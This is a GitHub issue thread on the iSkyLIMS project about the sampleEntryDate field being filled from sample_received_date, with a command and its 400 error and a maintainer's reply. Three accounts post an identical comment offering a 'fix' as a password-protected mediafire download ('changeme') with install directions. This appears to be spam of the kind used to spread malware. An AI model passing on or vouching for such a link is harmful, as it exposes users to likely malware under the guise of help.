### ISSUE TITLE
missconception with sample_received_date field

### ISSUE THREAD

**Issue by Shettland** [BU-ISCIII/iSkyLIMS#287]
### Description of the bug

At the time being `sampleEntryDate` in iskylims is a required property, which by its name should be the date when the samples was uploaded into iskylims. Nonetheless this field is filled using `sample_received_date` from the json that is being uploaded instead. The latter is supposed to be the date the originating laboratory received the sample, and therefore they do not match.

I think that `sampleEntryDate` should just take the date and time of the post request.

### Command used and terminal output

```console
$: relecov-tools update-db -j bioinfo_processed_metadata_lab_2024_05_22.json -t sample -d iskylims

Unable to post parameters. Received error code 400
 Received error 400
 Unable to post data because  "'sampleEntryDate' is not defined in your query"
```

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by luissian** [comment]
This issue is not relevant to iSkyLIMS. It belongs to the application which sends the request do it properly.
